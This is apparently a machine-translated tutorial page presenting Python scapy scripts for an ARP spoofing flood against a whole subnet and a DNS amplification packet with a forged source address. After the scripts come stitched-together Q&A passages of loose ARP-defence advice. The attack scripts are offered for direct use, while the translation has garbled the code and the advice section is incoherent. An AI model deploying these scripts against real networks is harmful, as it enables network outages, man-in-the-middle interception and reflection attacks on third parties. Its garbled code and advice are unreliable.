Python uses scapy to simulate packets to implement arp attacks and dns amplification attacks. For example, pythonscapy

Python uses scapy to simulate packets to implement arp attacks and dns amplification attacks. For example, pythonscapy

Scapy is a powerful interactive data packet processing program written in python. It can be used to send, sniff, parse and forge network data packets, and is often used in network attacks and tests.

Here we will use python scapy directly.

This is an arp attack. You can launch an arp attack.

Copy codeThe Code is as follows:
#! /Usr/bin/python
"""
ARP attack
"""
Import sys, OS
From scapy. all import *
If OS. geteuid ()! = 0:
Print "This program must be run as root. Aborting ."
Sys. exit ()

If len (sys. argv) <2:
Print "Pkease Use % s x. x. x" % (sys. argv [0])
Exit ()
AttackIP = sys. argv [1] + ". 0/24"
Srploop (Ether (dst = "FF: FF")/ARP (pdst = attackIP, psrc = "192.168.1.100", hwsrc = "00: 66: 66: 66: 66: 66 "), timeout = 2)

Dns amplification attacks

Copy codeThe Code is as follows:
# Coding: UTF-8
From scapy import *
From scapy. all import *

A = IP (dst = '8. 8.8.8 ', src = '192. 168.1.200') #192.168.1.200 is a forged source ip address.
B = UDP (dport = 53)
C = DNS (id = 1, qr = 0, opcode = 0, tc = 0, rd = 1, qdcount = 1, ancount = 0, nscount = 0, arcount = 0)
C. qd = DNSQR (qname = 'www .qq.com ', qtype = 1, qclass = 1)
P = a/B/c
Send (p)
~

Arp intrusion and DNS Spoofing Attacks

Hello friend, ARP attacks are ARP spoofing by forging IP addresses and MAC addresses, which can generate a large amount of ARP traffic on the network to block the network, attackers can change the IP-MAC entries in the ARP cache of the target host as long as they continuously generate forged ARP response packets, resulting in network interruptions or man-in-the-middle attacks.
ARP attacks mainly exist in LAN networks. If a person in LAN is infected with an ARP Trojan, the system infected with the ARP Trojan will attempt to intercept the communication information of other computers in the network through ARP spoofing, and thus cause communication faults of other computers in the network.
We recommend that you install the 360 Trojan firewall. The 360 security guard's arpfirewall is very useful for ARP attacks. After installation, the arpfirewall is disabled by default. You can enable it on your own, this will help you stop ARP attacks. You can download the latest 360 security guard from the 360 Official website. The Trojan firewall is in the 360 security guard.
I hope my answers will help you.

DNS spoofing attacks, ARP attacks are completely inaccessible to the Internet. What should I do?

The defense against ARP attacks makes it possible for you to never fall offline under ARP brute-force rain attacks.
Is your LAN frequently disconnected? Have you been attacked by ARP? Is there any annoying IP address conflict? If there is, or to prevent future risks, please refer to the following section to teach you the best way to counter ARP attacks, so that you will never lose line under ARP's artillery and rain attacks.
Situation:
First. In Lan, cyber law enforcement officers, scissors, and other tools are often used to restrict other people from accessing the internet. Although anti-cyber law enforcement officers and other software are available, they are very uncomfortable to use!
Second. Virus exists in the LAN, and a large number of ARP attacks are automatically sent to the LAN.
Principle:
ARP is the basis for finding IP addresses and NICs in windows networks. So you cannot bypass it. All methods used to defend against ARP attacks must permit ARP. As a result, currently, only the attack information can be monitored by fairly feasible network tools such as 360 security guard, but nothing can be done by them.
Specific Method:
The most fundamental way to solve ARP attacks is to create a virtual Nic. You can use the bubble fish virtual network card, which can be downloaded on a large download site.
Specify the IP address of the virtual network card as the IP address of the gateway of the network card that you normally use. For example, if the IP address of your network card is 10.176.168.33 and the gateway is 10.176.168.1, then, right-click the new virtual network card and disable it. This Nic must be disabled. Otherwise, you will be connected to the virtual Nic, but it will not work.